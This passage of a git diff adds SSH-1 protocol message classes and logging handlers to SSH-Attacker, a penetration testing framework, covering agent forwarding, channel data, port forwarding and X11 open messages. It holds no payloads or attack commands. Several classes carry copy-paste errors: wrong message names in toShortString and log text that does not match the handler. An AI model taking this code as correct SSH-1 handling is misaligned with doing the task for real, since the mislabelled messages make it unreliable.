de.rub.nds.sshattacker.core.protocol.ssh1.message.AgentOpenMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ExitStatusMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class AgentOpenMessageSSHV1Handler extends SshMessageHandler { + + private static final Logger LOGGER = LogManager.getLogger(); + + public AgentOpenMessageSSHV1Handler(SshContext context) { + super(context); + } + + @Override + public void adjustContext(AgentOpenMessageSSH1 message) { + LOGGER.warn("Recieved agent Open on Channel {}", message.getLocalChannel().getValue()); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/AgentRequestForwardingMessageSSHV1Handler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/AgentRequestForwardingMessageSSHV1Handler.java new file mode 100644 index 000000000..dc6d5580d --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/AgentRequestForwardingMessageSSHV1Handler.java @@ -0,0 +1,34 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.handler; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.AgentRequestForwardingMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.EofMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class AgentRequestForwardingMessageSSHV1Handler extends SshMessageHandler { + + private static final Logger LOGGER = LogManager.getLogger(); + + public AgentRequestForwardingMessageSSHV1Handler(SshContext context) { + super(context); + } + + /*public HybridKeyExchangeReplyMessageHandler( + SshContext context, HybridKeyExchangeReplyMessage message) { + super(context, message); + }*/ + + @Override + public void adjustContext(AgentRequestForwardingMessageSSH1 message) { + LOGGER.info("Recived a EOF Message"); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ChannelCloseConfirmationMessageSSHV1Handler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ChannelCloseConfirmationMessageSSHV1Handler.java new file mode 100644 index 000000000..3bcfe33e9 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ChannelCloseConfirmationMessageSSHV1Handler.java @@ -0,0 +1,29 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.handler; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ChannelCloseConfirmationMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ChannelCloseMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class ChannelCloseConfirmationMessageSSHV1Handler extends SshMessageHandler { + + private static final Logger LOGGER = LogManager.getLogger(); + + public ChannelCloseConfirmationMessageSSHV1Handler(SshContext context) { + super(context); + } + + @Override + public void adjustContext(ChannelCloseConfirmationMessageSSH1 message) { + LOGGER.warn("Recieved channel open failure for channel{}", message.getRemoteChannel().getValue()); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ChannelCloseMessageSSHV1Handler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ChannelCloseMessageSSHV1Handler.java new file mode 100644 index 000000000..2affd9331 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ChannelCloseMessageSSHV1Handler.java @@ -0,0 +1,29 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.handler; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ChannelCloseMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ChannelOpenFailureMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class ChannelCloseMessageSSHV1Handler extends SshMessageHandler { + + private static final Logger LOGGER = LogManager.getLogger(); + + public ChannelCloseMessageSSHV1Handler(SshContext context) { + super(context); + } + + @Override + public void adjustContext(ChannelCloseMessageSSH1 message) { + LOGGER.warn("Recieved channel open failure for channel{}", message.getRemoteChannel().getValue()); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ChannelDataMessageSSHV1Handler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ChannelDataMessageSSHV1Handler.java new file mode 100644 index 000000000..1b846258d --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/ChannelDataMessageSSHV1Handler.java @@ -0,0 +1,29 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.handler; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ChannelDataMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ChannelOpenFailureMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class ChannelDataMessageSSHV1Handler extends SshMessageHandler { + + private static final Logger LOGGER = LogManager.getLogger(); + + public ChannelDataMessageSSHV1Handler(SshContext context) { + super(context); + } + + @Override + public void adjustContext(ChannelDataMessageSSH1 message) { + LOGGER.warn("Recieved channel Data in channel {} with data ", message.getRemoteChannel().getValue(), message.getData().getValue()); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/PortForwardRequestMessageSSHV1Handler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/PortForwardRequestMessageSSHV1Handler.java new file mode 100644 index 000000000..b1cb40006 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/PortForwardRequestMessageSSHV1Handler.java @@ -0,0 +1,29 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.handler; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.PortForwardRequestMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.X11OpenMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class PortForwardRequestMessageSSHV1Handler extends SshMessageHandler { + + private static final Logger LOGGER = LogManager.getLogger(); + + public PortForwardRequestMessageSSHV1Handler(SshContext context) { + super(context); + } + + @Override + public void adjustContext(PortForwardRequestMessageSSH1 message) { + LOGGER.warn("Forwording Port {} to {}:{}", message.getServerPort().getValue(), message.getHostToConnect().getValue(),message.getPortToConnect().getValue()); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/PortOpenMessageSSHV1Handler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/PortOpenMessageSSHV1Handler.java new file mode 100644 index 000000000..58103d104 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/PortOpenMessageSSHV1Handler.java @@ -0,0 +1,29 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.handler; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.PortForwardRequestMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.PortOpenMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class PortOpenMessageSSHV1Handler extends SshMessageHandler { + + private static final Logger LOGGER = LogManager.getLogger(); + + public PortOpenMessageSSHV1Handler(SshContext context) { + super(context); + } + + @Override + public void adjustContext(PortOpenMessageSSH1 message) { + LOGGER.warn("Opening Port {} to {} on Channel {} with originator_string{}", message.getPort().getValue(), message.getHostName().getValue(),message.getLocalChannel().getValue(), message.getOriginatorString()); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/X11OpenMessageSSHV1Handler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/X11OpenMessageSSHV1Handler.java new file mode 100644 index 000000000..336884e3b --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/handler/X11OpenMessageSSHV1Handler.java @@ -0,0 +1,29 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.handler; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.ChannelDataMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.X11OpenMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class X11OpenMessageSSHV1Handler extends SshMessageHandler { + + private static final Logger LOGGER = LogManager.getLogger(); + + public X11OpenMessageSSHV1Handler(SshContext context) { + super(context); + } + + @Override + public void adjustContext(X11OpenMessageSSH1 message) { + LOGGER.warn("Recieved channel Data in channel {} with data {}", message.getLocalChannel().getValue(), message.getOriginatorString().getValue()); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/AgentOpenMessageSSH1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/AgentOpenMessageSSH1.java new file mode 100644 index 000000000..d8ded92f8 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/AgentOpenMessageSSH1.java @@ -0,0 +1,69 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.message; + +import de.rub.nds.modifiablevariable.ModifiableVariableFactory; +import de.rub.nds.modifiablevariable.integer.ModifiableInteger; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessage; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.handler.AgentOpenMessageSSHV1Handler; +import de.rub.nds.sshattacker.core.protocol.ssh1.handler.ExitStatusMessageSSHV1Handler; +import de.rub.nds.sshattacker.core.protocol.ssh1.parser.AgentOpenMessageSSHV1Parser; +import de.rub.nds.sshattacker.core.protocol.ssh1.parser.ExitStatusMessageSSHV1Parser; +import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.AgentOpenMessageSSHV1Preparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.ExitStatusMessageSSHV1Preparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.AgentOpenMessageSSHV1Serializier; +import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.ExitStatusMessageSSHV1Serializier; + +import java.io.InputStream; + +public class AgentOpenMessageSSH1 extends SshMessage { + + private ModifiableInteger localChannel; + + public ModifiableInteger getLocalChannel() { + return localChannel; + } + + public void setLocalChannel(ModifiableInteger localChannel) { + this.localChannel = localChannel; + } + + public void setLocalChannel(int localChannel) { + this.localChannel = ModifiableVariableFactory.safelySetValue(this.localChannel, localChannel); + } + + @Override + public AgentOpenMessageSSHV1Handler getHandler(SshContext context) { + return new AgentOpenMessageSSHV1Handler(context); + } + + @Override + public SshMessageParser getParser( + SshContext context, InputStream stream) { + return new AgentOpenMessageSSHV1Parser(context, stream); + } + + @Override + public SshMessagePreparator getPreparator(SshContext context) { + return new AgentOpenMessageSSHV1Preparator(context.getChooser(), this); + } + + @Override + public SshMessageSerializer getSerializer(SshContext context) { + return new AgentOpenMessageSSHV1Serializier(this); + } + + @Override + public String toShortString() { + return "SSH_CMSG_EOF"; + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/AgentRequestForwardingMessageSSH1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/AgentRequestForwardingMessageSSH1.java new file mode 100644 index 000000000..01293f9fe --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/AgentRequestForwardingMessageSSH1.java @@ -0,0 +1,52 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.message; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessage; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.handler.AgentRequestForwardingMessageSSHV1Handler; +import de.rub.nds.sshattacker.core.protocol.ssh1.handler.EofMessageSSHV1Handler; +import de.rub.nds.sshattacker.core.protocol.ssh1.parser.AgentRequestForwardingMessageSSHV1Parser; +import de.rub.nds.sshattacker.core.protocol.ssh1.parser.EofMessageSSHV1Parser; +import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.AgentRequestForwardingMessageSSHV1Preparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.EofMessageSSHV1Preparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.AgentRequestForwardingMessageSSHV1Serializier; +import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.EofMessageSSHV1Serializier; + +import java.io.InputStream; + +public class AgentRequestForwardingMessageSSH1 extends SshMessage { + + @Override + public AgentRequestForwardingMessageSSHV1Handler getHandler(SshContext context) { + return new AgentRequestForwardingMessageSSHV1Handler(context); + } + + @Override + public SshMessageParser getParser(SshContext context, InputStream stream) { + return new AgentRequestForwardingMessageSSHV1Parser(context, stream); + } + + @Override + public SshMessagePreparator getPreparator(SshContext context) { + return new AgentRequestForwardingMessageSSHV1Preparator(context.getChooser(), this); + } + + @Override + public SshMessageSerializer getSerializer(SshContext context) { + return new AgentRequestForwardingMessageSSHV1Serializier(this); + } + + @Override + public String toShortString() { + return "SSH_CMSG_EOF"; + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ChannelCloseConfirmationMessageSSH1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ChannelCloseConfirmationMessageSSH1.java new file mode 100644 index 000000000..6c4d300ff --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ChannelCloseConfirmationMessageSSH1.java @@ -0,0 +1,69 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.message; + +import de.rub.nds.modifiablevariable.ModifiableVariableFactory; +import de.rub.nds.modifiablevariable.integer.ModifiableInteger; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessage; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.handler.ChannelCloseConfirmationMessageSSHV1Handler; +import de.rub.nds.sshattacker.core.protocol.ssh1.handler.ChannelCloseMessageSSHV1Handler; +import de.rub.nds.sshattacker.core.protocol.ssh1.parser.ChannelCloseConfirmationMessageSSHV1Parser; +import de.rub.nds.sshattacker.core.protocol.ssh1.parser.ChannelCloseMessageSSHV1Parser; +import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.ChannelCloseConfirmationMessageSSHV1Preparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.ChannelCloseMessageSSHV1Preparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.ChannelCloseConfirmationMessageSSHV1Serializier; +import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.ChannelCloseMessageSSHV1Serializier; + +import java.io.InputStream; + +public class ChannelCloseConfirmationMessageSSH1 extends SshMessage { + + private ModifiableInteger remoteChannel; + + public ModifiableInteger getRemoteChannel() { + return remoteChannel; + } + + public void setRemoteChannel(ModifiableInteger remoteChannel) { + this.remoteChannel = remoteChannel; + } + + public void setRemoteChannel(int remoteChannel) { + this.remoteChannel = ModifiableVariableFactory.safelySetValue(this.remoteChannel, remoteChannel); + } + + @Override + public ChannelCloseConfirmationMessageSSHV1Handler getHandler(SshContext context) { + return new ChannelCloseConfirmationMessageSSHV1Handler(context); + } + + @Override + public SshMessageParser getParser( + SshContext context, InputStream stream) { + return new ChannelCloseConfirmationMessageSSHV1Parser(context, stream); + } + + @Override + public SshMessagePreparator getPreparator(SshContext context) { + return new ChannelCloseConfirmationMessageSSHV1Preparator(context.getChooser(), this); + } + + @Override + public SshMessageSerializer getSerializer(SshContext context) { + return new ChannelCloseConfirmationMessageSSHV1Serializier(this); + } + + @Override + public String toShortString() { + return "SSH_MSG_CHANNEL_OPEN_FAILURE"; + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ChannelCloseMessageSSH1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ChannelCloseMessageSSH1.java new file mode 100644 index 000000000..e74418c52 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ChannelCloseMessageSSH1.java @@ -0,0 +1,69 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.message; + +import de.rub.nds.modifiablevariable.ModifiableVariableFactory; +import de.rub.nds.modifiablevariable.integer.ModifiableInteger; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessage; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.handler.ChannelCloseMessageSSHV1Handler; +import de.rub.nds.sshattacker.core.protocol.ssh1.handler.ChannelOpenFailureMessageSSHV1Handler; +import de.rub.nds.sshattacker.core.protocol.ssh1.parser.ChannelCloseMessageSSHV1Parser; +import de.rub.nds.sshattacker.core.protocol.ssh1.parser.ChannelOpenFailureMessageSSHV1Parser; +import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.ChannelCloseMessageSSHV1Preparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.ChannelOpenFailureMessageSSHV1Preparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.ChannelCloseMessageSSHV1Serializier; +import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.ChannelOpenFailureMessageSSHV1Serializier; + +import java.io.InputStream; + +public class ChannelCloseMessageSSH1 extends SshMessage { + + private ModifiableInteger remoteChannel; + + public ModifiableInteger getRemoteChannel() { + return remoteChannel; + } + + public void setRemoteChannel(ModifiableInteger remoteChannel) { + this.remoteChannel = remoteChannel; + } + + public void setRemoteChannel(int remoteChannel) { + this.remoteChannel = ModifiableVariableFactory.safelySetValue(this.remoteChannel, remoteChannel); + } + + @Override + public ChannelCloseMessageSSHV1Handler getHandler(SshContext context) { + return new ChannelCloseMessageSSHV1Handler(context); + } + + @Override + public SshMessageParser getParser( + SshContext context, InputStream stream) { + return new ChannelCloseMessageSSHV1Parser(context, stream); + } + + @Override + public SshMessagePreparator getPreparator(SshContext context) { + return new ChannelCloseMessageSSHV1Preparator(context.getChooser(), this); + } + + @Override + public SshMessageSerializer getSerializer(SshContext context) { + return new ChannelCloseMessageSSHV1Serializier(this); + } + + @Override + public String toShortString() { + return "SSH_MSG_CHANNEL_OPEN_FAILURE"; + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ChannelDataMessageSSH1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ChannelDataMessageSSH1.java new file mode 100644 index 000000000..f57b8af9d --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/ChannelDataMessageSSH1.java @@ -0,0 +1,84 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.message; + +import de.rub.nds.modifiablevariable.ModifiableVariableFactory; +import de.rub.nds.modifiablevariable.integer.ModifiableInteger; +import de.rub.nds.modifiablevariable.string.ModifiableString; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessage; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.handler.ChannelDataMessageSSHV1Handler; +import de.rub.nds.sshattacker.core.protocol.ssh1.handler.ChannelOpenFailureMessageSSHV1Handler; +import de.rub.nds.sshattacker.core.protocol.ssh1.parser.ChannelDataMessageSSHV1Parser; +import de.rub.nds.sshattacker.core.protocol.ssh1.parser.ChannelOpenFailureMessageSSHV1Parser; +import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.ChannelDataMessageSSHV1Preparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.ChannelOpenFailureMessageSSHV1Preparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.ChannelDataMessageSSHV1Serializier; +import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.ChannelOpenFailureMessageSSHV1Serializier; + +import java.io.InputStream; + +public class ChannelDataMessageSSH1 extends SshMessage { + + private ModifiableInteger remoteChannel; + private ModifiableString data; + + public ModifiableString getData() { + return data; + } + + public void setData(ModifiableString data) { + this.data = data; + } + + public void setData(String data) { + this.data = ModifiableVariableFactory.safelySetValue(this.data, data); + } + + + public ModifiableInteger getRemoteChannel() { + return remoteChannel; + } + + public void setRemoteChannel(ModifiableInteger remoteChannel) { + this.remoteChannel = remoteChannel; + } + + public void setRemoteChannel(int remoteChannel) { + this.remoteChannel = ModifiableVariableFactory.safelySetValue(this.remoteChannel, remoteChannel); + } + + @Override + public ChannelDataMessageSSHV1Handler getHandler(SshContext context) { + return new ChannelDataMessageSSHV1Handler(context); + } + + @Override + public SshMessageParser getParser( + SshContext context, InputStream stream) { + return new ChannelDataMessageSSHV1Parser(context, stream); + } + + @Override + public SshMessagePreparator getPreparator(SshContext context) { + return new ChannelDataMessageSSHV1Preparator(context.getChooser(), this); + } + + @Override + public SshMessageSerializer getSerializer(SshContext context) { + return new ChannelDataMessageSSHV1Serializier(this); + } + + @Override + public String toShortString() { + return "SSH_MSG_CHANNEL_OPEN_FAILURE"; + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/PortForwardRequestMessageSSH1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/PortForwardRequestMessageSSH1.java new file mode 100644 index 000000000..b490295d8 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/PortForwardRequestMessageSSH1.java @@ -0,0 +1,97 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.message; + +import de.rub.nds.modifiablevariable.ModifiableVariableFactory; +import de.rub.nds.modifiablevariable.integer.ModifiableInteger; +import de.rub.nds.modifiablevariable.string.ModifiableString; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessage; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.handler.PortForwardRequestMessageSSHV1Handler; +import de.rub.nds.sshattacker.core.protocol.ssh1.handler.X11OpenMessageSSHV1Handler; +import de.rub.nds.sshattacker.core.protocol.ssh1.parser.PortForwardRequestMessageSSHV1Parser; +import de.rub.nds.sshattacker.core.protocol.ssh1.parser.X11OpenMessageSSHV1Parser; +import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.PortForwardRequestMessageSSHV1Preparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.preparator.X11OpenMessageSSHV1Preparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.PortForwardRequestMessageSSHV1Serializier; +import de.rub.nds.sshattacker.core.protocol.ssh1.serializer.X11OpenMessageSSHV1Serializier; + +import java.io.InputStream; + +public class PortForwardRequestMessageSSH1 extends SshMessage { + + private ModifiableInteger serverPort; + private ModifiableString hostToConnect; + + private ModifiableInteger portToConnect; + public ModifiableString getHostToConnect() { + return hostToConnect; + } + + public ModifiableInteger getPortToConnect() { + return portToConnect; + } + + public void setPortToConnect(ModifiableInteger portToConnect) { + this.portToConnect = portToConnect; + } + + public void setPortToConnect(int portToConnect) { + this.portToConnect = ModifiableVariableFactory.safelySetValue(this.portToConnect,portToConnect); + } + + public void setHostToConnect(ModifiableString hostToConnect) { + this.hostToConnect = hostToConnect; + } + + public void setHostToConnect(String hostToConnect) { + this.hostToConnect = ModifiableVariableFactory.safelySetValue(this.hostToConnect, hostToConnect); + } + + + public ModifiableInteger getServerPort() { + return serverPort; + } + + public void setServerPort(ModifiableInteger serverPort) { + this.serverPort = serverPort; + } + + public void setServerPort(int serverPort) { + this.serverPort = ModifiableVariableFactory.safelySetValue(this.serverPort, serverPort); + } + + @Override + public PortForwardRequestMessageSSHV1Handler getHandler(SshContext context) { + return new PortForwardRequestMessageSSHV1Handler(context); + } + + @Override + public SshMessageParser getParser( + SshContext context, InputStream stream) { + return new PortForwardRequestMessageSSHV1Parser(context, stream); + } + + @Override + public SshMessagePreparator getPreparator(SshContext context) { + return new PortForwardRequestMessageSSHV1Preparator(context.getChooser(), this); + } + + @Override + public SshMessageSerializer getSerializer(SshContext context) { + return new PortForwardRequestMessageSSHV1Serializier(this); + } + + @Override + public String toShortString() { + return "SSH_MSG_CHANNEL_OPEN_FAILURE"; + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/PortOpenMessageSSH1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/message/PortOpenMessageSSH1.java new 